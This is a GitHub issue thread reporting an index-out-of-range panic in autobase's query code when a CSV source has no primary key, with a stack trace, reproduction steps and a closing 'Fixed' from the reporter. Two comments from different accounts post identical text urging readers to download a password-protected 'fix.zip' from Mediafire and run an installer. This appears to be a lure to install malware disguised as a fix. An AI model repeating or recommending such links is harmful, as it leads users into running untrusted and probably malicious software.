### ISSUE TITLE
Index out of range when no primary key is specified

### ISSUE THREAD

**Issue by mvishok** [mvishok/autobase#1]
**Describe the bug**
When no primary key is specified in the CSV source, an index out of range occurs.

2024/08/26 13:20:36 [Recovery] 2024/08/26 - 13:20:36 panic recovered:
runtime error: index out of range [-1]
C:/Program Files/Go/src/runtime/panic.go:114 (0x8581db)
        goPanicIndex: panic(boundsError{x: int64(x), signed: true, y: y, code: boundsIndex})
D:/autobase/src/pkg/core/query/query.go:106 (0x95306c)
        Run: if len(value) > 2 && value[0] == rows[0][primaryKey] {
D:/autobase/src/main.go:90 (0xb7413e)
        handleRequest: response := query.Run(csvPath, requestQuery, c.GetString("access_level"))

**To Reproduce**
1. Create an autobase project
2. Have no primary key
3. Select with a where clause with only one field

**Expected behavior**
The query gets executed

**Screenshots**
![image](https://github.com/user-attachments/assets/f3845852-2b62-400f-8a40-4b864478bae1)

**Desktop (please complete the following information):**
 - OS: Windows 10

**Additional context**
Tried running a smartfolio project

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mvishok** [comment]
Fixed
